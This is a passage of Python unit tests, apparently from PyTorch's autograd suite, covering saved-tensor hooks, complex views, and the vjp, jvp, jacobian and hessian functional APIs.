a = get_input()
y = a * a
y.grad_fn._raw_saved_self.register_hooks(lambda x: x, lambda x: 1)
with self.assertRaisesRegex(TypeError, "Output of saved tensor unpack_hook expected to be a Tensor"):
print(y.grad_fn._saved_self)
def inplace_double(x):
x *= 2
return x
a = get_input()
t = a * a
t.grad_fn._raw_saved_self.register_hooks(inplace_double, lambda x: x / 2)
y = t * 2
with self.assertRaisesRegex(
RuntimeError,
"one of the variables needed for gradient computation has been modified by an inplace operation"):
y.sum().backward()
# leaf
test(lambda: torch.randn(5, requires_grad=True), True)
# not leaf, not output
test(lambda: (1 + torch.randn(5, requires_grad=True)), False)
def test_saved_variable_packing_unpacking_did_not_save_original(self):
a = torch.randn(5, requires_grad=True)
y = torch.exp(a)
y.grad_fn._raw_saved_result.register_hooks(lambda x: x, lambda x: x)
self.assertEqual(y, y.grad_fn._saved_result)
self.assertIs(y.grad_fn, y.grad_fn._saved_result.grad_fn)
y.sum().backward()
self.assertEqual(a.grad, y)
def index_perm_variable(shape, max_indices):
if not isinstance(shape, tuple):
shape = (shape,)
index = torch.randperm(max_indices).narrow(0, 0, reduce(mul, shape)).view(shape)
return index
def bernoulli_scalar():
return torch.tensor(0, dtype=torch.uint8).bernoulli_()
def gradgradcheck_method_precision_override(test_name):
# these are just empirical observations, we should improve
gradgradcheck_precision_override = {
'test_norm': {'atol': 2e-2, 'rtol': 1e-2},
'test_norm_1_5': {'atol': 1.5e-2, 'rtol': 1e-2},
'test_norm_3': {'atol': 5e-2, 'rtol': 1e-2},
'test_dist': {'atol': 5e-2, 'rtol': 1e-2},
'test_dist_4': {'atol': 8e-2, 'rtol': 1e-2},
}
non_broadcasted_test_name = test_name.split("_broadcast")[0]
override = gradgradcheck_precision_override.get(non_broadcasted_test_name)
if override:
if 'broadcast_lhs' in test_name or 'broadcast_rhs' in test_name:
# errors accumulated across 1 dimension
override = {'atol': override['atol'] * S, 'rtol': override['atol'] * S}
elif 'broadcast_all' in test_name:
# errors accumulated across multiple dimensions
override = {'atol': override['atol'] * S * S, 'rtol': override['atol'] * S * S}
return override
def run_grad_and_gradgrad_checks(test_case, name, test_name, apply_method, output_variable,
input_variables, run_gradgradcheck=True, check_batched_grad=True,
check_forward_ad=False):
test_case.assertTrue(gradcheck(apply_method, input_variables, eps=1e-6, atol=PRECISION,
check_batched_grad=check_batched_grad, check_forward_ad=check_forward_ad))
gradgradcheck_precision_override = gradgradcheck_method_precision_override(test_name)
if gradgradcheck_precision_override is not None:
atol = gradgradcheck_precision_override['atol']
rtol = gradgradcheck_precision_override['rtol']
test_case.assertTrue(gradgradcheck(apply_method, input_variables, None, atol=atol, rtol=rtol,
gen_non_contig_grad_outputs=True,
check_batched_grad=check_batched_grad))
else:
test_case.assertTrue(gradgradcheck(apply_method, input_variables,
gen_non_contig_grad_outputs=True,
check_batched_grad=check_batched_grad))
def run_functional_checks(test_case, test_name, name, apply_fn, run_grad_checks,
f_args_variable, f_args_tensor, *, check_forward_ad=False):
output_variable = apply_fn(*f_args_variable)
if run_grad_checks:
run_grad_and_gradgrad_checks(test_case, name, test_name, apply_fn,
output_variable, f_args_variable, check_forward_ad=check_forward_ad)
self_variable = f_args_variable[0]
if isinstance(output_variable, torch.Tensor) and output_variable.requires_grad and self_variable is not None:
output_variable.backward(torch.randn_like(output_variable))
test_case.assertEqualTypeString(self_variable, self_variable.grad)
test_case.assertEqual(self_variable.size(), self_variable.grad.size())
class TestAutogradComplex(TestCase):
def test_view_func_for_complex_views(self):
# case 1: both parent and child have view_func
x = torch.randn(2, 2, 2, dtype=torch.double, requires_grad=True)
y = x.detach().requires_grad_(True)
x0 = x.clone()
x1 = torch.view_as_complex(x0)
x2 = torch.view_as_real(x1)
x2.mul_(2)
x2.sum().backward()
y0 = y.clone()
y0.mul_(2)
y0.sum().backward()
self.assertEqual(x.grad, y.grad)
# case 2: parent has view_func but child does not
x = torch.randn(2, 2, 2, dtype=torch.double, requires_grad=True)
y = x.detach().requires_grad_(True)
def fn(a):
b = a.clone()
b1 = torch.view_as_complex(b)
b2 = b1.reshape(b1.numel())
return b2
x0 = fn(x)
x0.mul_(2)
x0.sum().backward()
y0 = fn(y)
y1 = y0.mul(2)
y1.sum().backward()
self.assertEqual(x.grad, y.grad)
# case 3: parent does not have a view_func but child does
x = torch.randn(10, dtype=torch.cdouble, requires_grad=True)
y = x.detach().requires_grad_(True)
def fn(a, dim0_size=5):
b = a.clone()
b1 = b.reshape(dim0_size, 2)
b2 = torch.view_as_real(b1)
return b2
x0 = fn(x)
x0.mul_(2)
x0.sum().backward()
y0 = fn(y)
y1 = y0.mul(2)
y1.sum().backward()
self.assertEqual(x.grad, y.grad)
def test_view_with_multi_output(self):
x = torch.randn(2, 2, 2, dtype=torch.double)
x1 = torch.view_as_complex(x)
# Taking an invalid view should always be allowed as long as it is not
# modified inplace
res = x1.unbind(0)
with self.assertRaisesRegex(RuntimeError, "output of a function that returns multiple views"):
res[0] += torch.rand(2, requires_grad=True)
x.requires_grad_(True)
x1 = torch.view_as_complex(x)
# Taking an invalid view should always be allowed as long as it is not
# modified inplace
res = x1.unbind(0)
with self.assertRaisesRegex(RuntimeError, "output of a function that returns multiple views"):
res[0] += torch.rand(2, requires_grad=True)
def as_identity(self):
# view_as_real and view_as_complex behavior should be like an identity
def func(z):
z_ = torch.view_as_complex(z)
z_select = torch.select(z_, z_.dim() - 1, 0)
z_select_real = torch.view_as_real(z_select)
return z_select_real.sum()
z = torch.randn(10, 2, 2, dtype=torch.double, requires_grad=True)
gradcheck(func, [z])
func(z).backward()
z1 = z.clone().detach().requires_grad_(True)
torch.select(z1, z1.dim() - 2, 0).sum().backward()
self.assertEqual(z.grad, z1.grad)
class TestAutogradFunctional(TestCase):
def _assert_same_struct(self, res, base):
# base and res should be Tensors or tuple of Tensors with the same size
if isinstance(base, torch.Tensor):
self.assertTrue(isinstance(res, torch.Tensor))
self.assertEqual(base.size(), res.size())
elif isinstance(base, tuple):
self.assertTrue(isinstance(res, tuple))
self.assertEqual(len(base), len(res))
for el_base, el_res in zip(base, res):
self.assertTrue(isinstance(el_base, torch.Tensor))
self.assertTrue(isinstance(el_res, torch.Tensor))
self.assertEqual(el_base.size(), el_res.size())
else:
# Wrong base
raise RuntimeError("The base given to `_assert_same_struct` doesn't have"
" the right structure.")
def _assert_interleaved_struct(self, res, base1, base2):
# base1 and base2 can be Tensors or tuples of Tensors.
# If they are tuples, res should be a tuple as well.
# The indexing works as follows for base1, base2 being
# - tuple, tuple: res[i][j][k][l] = (base1[i][k], base2[j][l])
# - tuple, Tensor: res[i][k][l] = (base1[i][k], base2[l])
# - Tensor, tuple: res[i][j][l] = (base1[i], base2[j][l])
# - Tensor, Tensor: res[k][l] = (base1[k], base2[l])
if isinstance(base1, torch.Tensor) and isinstance(base2, torch.Tensor):
self.assertTrue(isinstance(res, torch.Tensor))
self.assertEqual(res.size(), base1.size() + base2.size())
elif isinstance(base1, tuple) and isinstance(base2, torch.Tensor):
self.assertTrue(isinstance(res, tuple))
self.assertEqual(len(res), len(base1))
for el_res, el_base1 in zip(res, base1):
self.assertTrue(isinstance(el_res, torch.Tensor))
self.assertTrue(isinstance(el_base1, torch.Tensor))
self.assertEqual(el_res.size(), el_base1.size() + base2.size())
elif isinstance(base1, torch.Tensor) and isinstance(base2, tuple):
self.assertTrue(isinstance(res, tuple))
self.assertEqual(len(res), len(base2))
for el_res, el_base2 in zip(res, base2):
self.assertTrue(isinstance(el_res, torch.Tensor))
self.assertTrue(isinstance(el_base2, torch.Tensor))
self.assertEqual(el_res.size(), base1.size() + el_base2.size())
elif isinstance(base1, tuple) and isinstance(base2, tuple):
self.assertTrue(isinstance(res, tuple))
self.assertEqual(len(res), len(base1))
for el_res, el_base1 in zip(res, base1):
self.assertTrue(isinstance(el_res, tuple))
self.assertEqual(len(res), len(base2))
for el_el_res, el_base2 in zip(el_res, base2):
self.assertTrue(isinstance(el_el_res, torch.Tensor))
self.assertTrue(isinstance(el_base2, torch.Tensor))
self.assertEqual(el_el_res.size(), el_base1.size() + el_base2.size())
else:
# Wrong bases
raise RuntimeError("The bases given to `_assert_interleaved_struct` don't have"
" the right structure.")
def test_vjp_err_check(self):
def foo(a):
return 3 * a.narrow(0, 0, 3)
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
inp = torch.rand(4)
v = torch.ones(3)
with self.assertRaisesRegex(TypeError, "The inputs given to vjp must be either a Tensor"):
res = autogradF.vjp(foo, (inp, 2), v)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to vjp must"):
res = autogradF.vjp(bar, inp, v)
with self.assertRaisesRegex(RuntimeError, "The vector v can only be None if the user-provided function returns"):
res = autogradF.vjp(foo, inp)
with self.assertRaisesRegex(RuntimeError, "The given v should contain a single Tensor."):
res = autogradF.vjp(foo, inp, (torch.ones_like(inp), torch.ones_like(inp)))
with self.assertRaisesRegex(RuntimeError, "v has invalid size: should be torch.Size"):
res = autogradF.vjp(foo, inp, v[:2])
res = autogradF.vjp(foo, inp, v)[1]
self._assert_same_struct(res, inp)
def test_vjp_err_check_strict(self):
def foo(a):
return a.detach()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone()
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.vjp(foo, inp, v, strict=True)
res = autogradF.vjp(foo, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"):
res = autogradF.vjp(bar, inp, v, strict=True)
res = autogradF.vjp(bar, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
# The Jacobian does not depend on the input
def foo(a):
return a.clone()
inp.requires_grad_()
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function is independent of input 0."):
res = autogradF.vjp(foo, inp, v, create_graph=True, strict=True)
res = autogradF.vjp(foo, inp, v, create_graph=True, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1], v)
def test_vjp_no_grad(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(4, 4)
v = torch.ones(4)
with torch.no_grad():
res = autogradF.vjp(reducer, inputs, v)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
inputs.requires_grad_()
v.requires_grad_()
with torch.no_grad():
res = autogradF.vjp(reducer, inputs, v, create_graph=True)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
def test_vjp_output(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(4, 4)
v = torch.ones(4)
res = autogradF.vjp(reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
def adder(x, y):
return 2 * x + 3 * y
inputs = (torch.rand(2), torch.rand(2))
v = torch.ones(2)
out, vjp_val = autogradF.vjp(adder, inputs, v)
self._assert_same_struct(vjp_val, inputs)
self.assertIsNone(out.grad_fn)
self.assertIsNone(vjp_val[0].grad_fn)
self.assertIsNone(vjp_val[1].grad_fn)
def adder(x, y):
return 2 * x + 3 * y, x + y
inputs = (torch.rand(2), torch.rand(2))
v = (torch.tensor([1., 0.]), torch.tensor([1., 0.]))
out, vjp_val = autogradF.vjp(adder, inputs, v)
self._assert_same_struct(vjp_val, inputs)
self.assertIsNone(out[0].grad_fn)
self.assertIsNone(out[1].grad_fn)
self.assertIsNone(vjp_val[0].grad_fn)
self.assertIsNone(vjp_val[1].grad_fn)
def test_vjp_scalar(self):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
v = torch.ones([])
res = autogradF.vjp(reducer, inputs, v)
self._assert_same_struct(res[0], v)
self._assert_same_struct(res[1], inputs)
res = autogradF.vjp(reducer, inputs)
self._assert_same_struct(res[0], v)
self._assert_same_struct(res[1], inputs)
def expander(x):
return x.unsqueeze(0).repeat(4)
inputs = torch.rand([])
v = torch.ones(4)
res = autogradF.vjp(expander, inputs, v)
self._assert_same_struct(res[0], v)
self._assert_same_struct(res[1], inputs)
def test_vjp_create_graph(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(2, 2, dtype=torch.double)
v = torch.ones(2, dtype=torch.double)
inputs.requires_grad_()
v.requires_grad_()
res = autogradF.vjp(reducer, inputs, v, create_graph=True)
self._assert_same_struct(res[1], inputs)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
gradcheck(lambda inp, v: autogradF.vjp(reducer, inputs, v, create_graph=True), (inputs, v))
gradgradcheck(lambda inp, v: autogradF.vjp(reducer, inputs, v, create_graph=True), (inputs, v))
def adder(x, y):
return 2 * x + 3 * y, x * y
inputs = (torch.rand(2, dtype=torch.double, requires_grad=True),
torch.rand(2, dtype=torch.double, requires_grad=True))
v = (torch.tensor([1., 0.], dtype=torch.double, requires_grad=True),
torch.tensor([1., 0.], dtype=torch.double, requires_grad=True))
gradcheck(lambda *args: autogradF.vjp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)
gradgradcheck(lambda *args: autogradF.vjp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)
def foo(*args):
x, y = args[:2]
v = args[2:]
x = x.cos()
val, grad = autogradF.vjp(adder, (x, y), v, create_graph=True)
return val[0].exp() + val[1].exp() + grad[0].exp() + grad[1].exp() + x.exp() + y.exp()
gradcheck(foo, inputs + v)
gradgradcheck(foo, inputs + v)
def test_jvp_err_check(self):
def foo(a):
return 3 * a.narrow(0, 0, 3)
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(TypeError, "The inputs given to jvp must be either a Tensor"):
res = autogradF.jvp(foo, (inp, 2), v)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to jvp must"):
res = autogradF.jvp(bar, inp, v)
with self.assertRaisesRegex(RuntimeError, "The vector v can only be None if the input to the user-provided function"):
res = autogradF.jvp(foo, inp)
with self.assertRaisesRegex(RuntimeError, "The given v should contain a single Tensor."):
res = autogradF.jvp(foo, inp, (v, v))
with self.assertRaisesRegex(RuntimeError, "v has invalid size: should be torch.Size"):
res = autogradF.jvp(foo, inp, v[:2])
res = autogradF.jvp(foo, inp, v)[1]
self._assert_same_struct(res, foo(inp))
def test_jvp_err_check_strict(self):
def foo(a):
return a.detach()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone()
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.jvp(foo, inp, v, strict=True)
res = autogradF.jvp(foo, inp, v, strict=False)
self._assert_same_struct(res[1], res[0])
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"):
res = autogradF.jvp(bar, inp, v, strict=True)
res = autogradF.jvp(bar, inp, v, strict=False)
self._assert_same_struct(res[1], res[0])
self.assertEqual(res[1].abs().sum(), 0.)
# The Jacobian does not depend on the input
def foo(a):
return a.clone()
inp.requires_grad_()
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function is independent of input 0."):
res = autogradF.jvp(foo, inp, v, create_graph=True, strict=True)
res = autogradF.jvp(foo, inp, v, create_graph=True, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1], v)
def test_jvp_no_grad(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
with torch.no_grad():
res = autogradF.jvp(reducer, inputs, v)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
inputs.requires_grad_()
v.requires_grad_()
with torch.no_grad():
res = autogradF.jvp(reducer, inputs, v, create_graph=True)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
def test_jvp_output(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.jvp(reducer, inputs, v)
self._assert_same_struct(res[1], res[0])
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
def adder(x, y):
return 2 * x + 3 * y
inputs = (torch.rand(2), torch.rand(2))
v = (torch.ones(2), torch.ones(2))
out, jvp_val = autogradF.jvp(adder, inputs, v)
self._assert_same_struct(jvp_val, out)
self.assertIsNone(out.grad_fn)
self.assertIsNone(jvp_val[0].grad_fn)
self.assertIsNone(jvp_val[1].grad_fn)
def adder(x, y):
return 2 * x + 3 * y, x + y
inputs = (torch.rand(2), torch.rand(2))
v = (torch.tensor([1., 0.]), torch.tensor([1., 0.]))
out, jvp_val = autogradF.jvp(adder, inputs, v)
self._assert_same_struct(jvp_val, out)
self.assertIsNone(out[0].grad_fn)
self.assertIsNone(out[1].grad_fn)
self.assertIsNone(jvp_val[0].grad_fn)
self.assertIsNone(jvp_val[1].grad_fn)
def test_jvp_scalar(self):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.jvp(reducer, inputs, v)
self._assert_same_struct(res[0], torch.zeros([]))
self._assert_same_struct(res[1], res[0])
def expander(x):
return x.unsqueeze(0).repeat(4)
inputs = torch.rand([])
v = torch.ones([])
res = autogradF.jvp(expander, inputs, v)
self._assert_same_struct(res[0], torch.zeros(4))
self._assert_same_struct(res[1], res[0])
res = autogradF.jvp(expander, inputs)
self._assert_same_struct(res[0], torch.zeros(4))
self._assert_same_struct(res[1], res[0])
def test_jvp_create_graph(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(2, 2, dtype=torch.double)
v = torch.ones(2, 2, dtype=torch.double)
inputs.requires_grad_()
v.requires_grad_()
res = autogradF.jvp(reducer, inputs, v, create_graph=True)
self._assert_same_struct(res[1], res[0])
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
gradcheck(lambda inp, v: autogradF.jvp(reducer, inp, v, create_graph=True), (inputs, v))
gradgradcheck(lambda inp, v: autogradF.jvp(reducer, inp, v, create_graph=True), (inputs, v))
def adder(x, y):
return 2 * x + 3 * y, x * y
inputs = (torch.rand(2, dtype=torch.double, requires_grad=True),
torch.rand(2, dtype=torch.double, requires_grad=True))
v = (torch.tensor([1., 0.], dtype=torch.double, requires_grad=True),
torch.tensor([1., 0.], dtype=torch.double, requires_grad=True))
gradcheck(lambda *args: autogradF.jvp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)
gradgradcheck(lambda *args: autogradF.jvp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)
def foo(*args):
x, y = args[:2]
v = args[2:]
x = x.cos()
val, grad = autogradF.jvp(adder, (x, y), v, create_graph=True)
return val[0].exp() + val[1].exp() + grad[0].exp() + grad[1].exp() + x.exp() + y.exp()
gradcheck(foo, inputs + v)
gradgradcheck(foo, inputs + v)
def _test_construct_standard_basis_for(self, inputs):
numels = tuple(tensor.numel() for tensor in inputs)
results = autogradF._construct_standard_basis_for(inputs, numels)
for result, inp in zip(results, inputs):
self.assertEqual(result.dtype, inp.dtype)
self.assertEqual(result.device, inp.device)
results = torch.cat([result.to(device='cpu', dtype=torch.float)
for result in results], dim=1)
expected = torch.eye(results[0].shape[0], dtype=torch.float)
self.assertEqual(results, expected)
def test_construct_standard_basis_for(self):
test_cases = [
(torch.randn(2, 3),),
(torch.randn(1),),
(torch.randn([]),),
(torch.randn(1), torch.randn([]), torch.randn([])),
(torch.randn(2), torch.randn(3), torch.randn([])),
(torch.randn(2), torch.randn([]), torch.randn(3)),
(torch.randn(2, 3), torch.randn(3), torch.randn(3, 4, 2)),
(torch.randn(2, dtype=torch.float64), torch.randn(3, dtype=torch.float32)),
]
for inputs in test_cases:
self._test_construct_standard_basis_for(inputs)
@unittest.skipIf(not TEST_CUDA, "test requires CUDA")
def test_construct_standard_basis_for_cuda(self):
test_cases = [
(torch.randn(2), torch.randn(3, device='cuda')),
(torch.randn(3, device='cuda'), torch.randn(2)),
]
for inputs in test_cases:
self._test_construct_standard_basis_for(inputs)
def _test_vectorize_raises_no_warnings(self, api):
# vmap is an experimental prototype. When someone calls torch.vmap,
# it raises a python warning. This test checks that
# autogradF.{jacobian, hessian} don't raise that experimental prototype
# warning; it is not nice for a public-facing API to raise a warning
# no matter how it is called.
def foo(a):
return (a ** 2).sum()
x = torch.randn(3)
with warnings.catch_warnings(record=True) as wa:
result = api(foo, x, vectorize=True)
self.assertEqual(len(wa), 0)
def test_jacobian_vectorize_raises_no_warnings(self):
return self._test_vectorize_raises_no_warnings(autogradF.jacobian)
def test_hessian_vectorize_raises_no_warnings(self):
return self._test_vectorize_raises_no_warnings(autogradF.hessian)
def _test_jacobian_err_check(self, vectorize):
def foo(a):
return 3 * a.narrow(0, 0, 3)
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
inp = torch.rand(4)
with self.assertRaisesRegex(TypeError, "The inputs given to jacobian must be either a Tensor"):
res = autogradF.jacobian(foo, (inp, 2), vectorize=vectorize)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to jacobian must"):
res = autogradF.jacobian(bar, inp, vectorize=vectorize)
res = autogradF.jacobian(foo, inp, vectorize=vectorize)
self._assert_interleaved_struct(res, foo(inp), inp)
def foo(a, b):
return b, 3 * a.narrow(0, 0, 3)
inp = (torch.rand(4), torch.rand(5))
res = autogradF.jacobian(foo, inp, vectorize=vectorize)
self._assert_interleaved_struct(res, foo(*inp), inp)
def test_jacobian_err_check(self):
return self._test_jacobian_err_check(vectorize=False)
def test_jacobian_err_check_vectorize(self):
return self._test_jacobian_err_check(vectorize=True)
def test_jacobian_err_check_strict(self):
def foo(a):
return a.detach()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone()
inp = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.jacobian(foo, inp, strict=True)
res = autogradF.jacobian(foo, inp, strict=False)
self._assert_interleaved_struct(res, foo(inp), inp)
self.assertEqual(res.abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function is independent of input 0."):
res = autogradF.jacobian(bar, inp, strict=True)
res = autogradF.jacobian(bar, inp, strict=False)
self._assert_interleaved_struct(res, foo(inp), inp)
self.assertEqual(res.abs().sum(), 0.)
# The Jacobian does not depend on the input
def foo(a):
return a.clone()
inp.requires_grad_()
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function is independent of input 0."):
res = autogradF.jacobian(foo, inp, create_graph=True, strict=True)
res = autogradF.jacobian(foo, inp, create_graph=True, strict=False)
self._assert_interleaved_struct(res, inp, inp)
self.assertEqual(res, torch.eye(4))
def test_jacobian_err_check_strict_vectorize(self):
def foo(x):
return x
inp = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "not supported together"):
res = autogradF.jacobian(foo, inp, strict=True, vectorize=True)
def test_jacobian_no_grad(self):
def exp_reducer(x):
return x.exp().sum(dim=1)
inputs = torch.rand(4, 4)
with torch.no_grad():
res = autogradF.jacobian(exp_reducer, inputs)
self.assertIsNone(res.grad_fn)
self.assertNotEqual(res, torch.zeros(4, 4))
with torch.no_grad():
res = autogradF.jacobian(exp_reducer, inputs, create_graph=True)
self.assertIsNotNone(res.grad_fn)
self.assertNotEqual(res, torch.zeros(4, 4))
def _test_jacobian_output(self, vectorize):
def exp_reducer(x):
return x.exp().sum(dim=1)
inputs = torch.rand(4, 4)
res = autogradF.jacobian(exp_reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, exp_reducer(inputs), inputs)
self.assertIsNone(res.grad_fn)
def identity(x):
return x.clone()
inputs = torch.rand(4)
res = autogradF.jacobian(identity, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, identity(inputs), inputs)
self.assertIsNone(res.grad_fn)
self.assertEqual(res, torch.eye(4))
def add_exp_reducer(x, y):
return (x + y.exp()).sum(dim=1)
inputs = (torch.rand(4, 4), torch.rand(4, 4))
res = autogradF.jacobian(add_exp_reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, add_exp_reducer(*inputs), inputs)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
def test_jacobian_output(self):
self._test_jacobian_output(vectorize=False)
def test_jacobian_output_vectorize(self):
self._test_jacobian_output(vectorize=True)
def _test_jacobian_scalar(self, vectorize):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
res = autogradF.jacobian(reducer, inputs, vectorize=vectorize)
self._assert_same_struct(res, inputs)
def expander(x):
return x.unsqueeze(0).repeat(4)
inputs = torch.rand([])
res = autogradF.jacobian(expander, inputs, vectorize=vectorize)
self._assert_same_struct(res, torch.zeros(4))
def test_jacobian_scalar(self):
self._test_jacobian_scalar(vectorize=False)
def test_jacobian_scalar_vectorize(self):
self._test_jacobian_scalar(vectorize=True)
def _test_jacobian_create_graph(self, vectorize):
def exp_reducer(x):
return x.exp().sum(dim=1)
inputs = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
res = autogradF.jacobian(exp_reducer, inputs, create_graph=True, vectorize=vectorize)
self._assert_interleaved_struct(res, exp_reducer(inputs), inputs)
self.assertIsNotNone(res.grad_fn)
gradcheck(lambda inp: autogradF.jacobian(exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
gradgradcheck(lambda inp: autogradF.jacobian(exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
def add_exp_reducer(x, y):
return (x + y).exp().sum(dim=1)
inputs = (torch.rand(4, 4, dtype=torch.double, requires_grad=True),
torch.rand(4, 4, dtype=torch.double, requires_grad=True))
res = autogradF.jacobian(add_exp_reducer, inputs, create_graph=True, vectorize=vectorize)
self._assert_interleaved_struct(res, add_exp_reducer(*inputs), inputs)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
gradcheck(lambda *inp: autogradF.jacobian(add_exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
gradgradcheck(lambda *inp: autogradF.jacobian(add_exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
def foo(x, y):
x = x.cos()
val, jac = autogradF.jacobian(add_exp_reducer, (x, y), create_graph=True, vectorize=vectorize)
res = val[0].exp().sum() + val[1].exp().sum() + jac[0].exp().sum()
res = res + jac[1].exp().sum() + x.exp().sum() + y.exp().sum()
return res
gradcheck(foo, inputs)
gradgradcheck(foo, inputs)
def test_jacobian_create_graph(self):
self._test_jacobian_create_graph(vectorize=False)
def test_jacobian_create_graph_vectorize(self):
self._test_jacobian_create_graph(vectorize=True)
def _check_jacobian_vectorize_correctness(self, f, inputs):
expected = autogradF.jacobian(f, inputs, vectorize=False)
result = autogradF.jacobian(f, inputs, vectorize=True)
self.assertEqual(result, expected)
def test_jacobian_vectorize_correctness_simple(self):
def f(x):
return 3 * x ** 2
x = torch.randn(2, 3, 5)
self._check_jacobian_vectorize_correctness(f, x)
def test_jacobian_vectorize_correctness_multi_input(self):
def f(x, y):
return (x.cos() * x) @ y.sin()
x = torch.randn(2, 3)
y = torch.randn(3, 5)
self._check_jacobian_vectorize_correctness(f, (x, y))
def test_jacobian_vectorize_correctness_multi_input_multi_output(self):
def f(x, y):
return (x * x) @ y, x @ (x.sum(1) * y), y.sum()
x = torch.randn(5, 3)
y = torch.randn(3, 5)
self._check_jacobian_vectorize_correctness(f, (x, y))
def test_jacobian_vectorize_correctness_unrelated_outputs(self):
def f(x, y):
return x, y, x, y
x = torch.randn(2)
y = torch.randn(3)
self._check_jacobian_vectorize_correctness(f, (x, y))
def test_jacobian_vectorize_correctness_zero_dim(self):
# zero-dim output
def f(x, y):
return x.sum(), y.sum(), x * y
x = torch.randn(3)
y = torch.randn(3)
self._check_jacobian_vectorize_correctness(f, (x, y))
# zero-dim input
def g(x):
return torch.stack([x, x, x])
x = torch.randn([])
self._check_jacobian_vectorize_correctness(g, x)
# Mixed zero-dim input / zero-dim output
def h(x, y):
return y.sum(), x * y
x = torch.randn([])
y = torch.randn(1)
self._check_jacobian_vectorize_correctness(h, (x, y))
@unittest.skipIf(not TEST_CUDA, "test requires CUDA")
def test_jacobian_vectorize_correctness_different_devices(self):
def f(x, y):
return x * y, (x * y).cuda()
x = torch.randn(3)
y = torch.randn(3)
self._check_jacobian_vectorize_correctness(f, (x, y))
def test_jacobian_vectorize_correctness_different_dtype(self):
def f(x, y):
return (x * y).float(), (x * y).double()
x = torch.randn(3)
y = torch.randn(3)
self._check_jacobian_vectorize_correctness(f, (x, y))
def _check_hessian_vectorize_correctness(self, f, inputs):
expected = autogradF.hessian(f, inputs, vectorize=False)
result = autogradF.hessian(f, inputs, vectorize=True)
self.assertEqual(result, expected)
def test_hessian_vectorize_correctness_simple(self):
def f(x):
return (3 * x ** 2).sum()
x = torch.randn(2, 3, 5)
self._check_hessian_vectorize_correctness(f, x)
def test_hessian_vectorize_correctness_multi_input(self):
def f(x, y, z):
return ((x.relu() * x) @ y.sin() @ z).sum()
x = torch.randn(2, 3)
y = torch.randn(3, 5)
z = torch.randn(5, 5)
self._check_hessian_vectorize_correctness(f, (x, y, z))
def test_hessian_vectorize_correctness_unrelated_outputs(self):
# output unrelated to one input
def f(x, y):
return (x ** 2).sum()
x = torch.randn(2)
y = torch.randn(3)
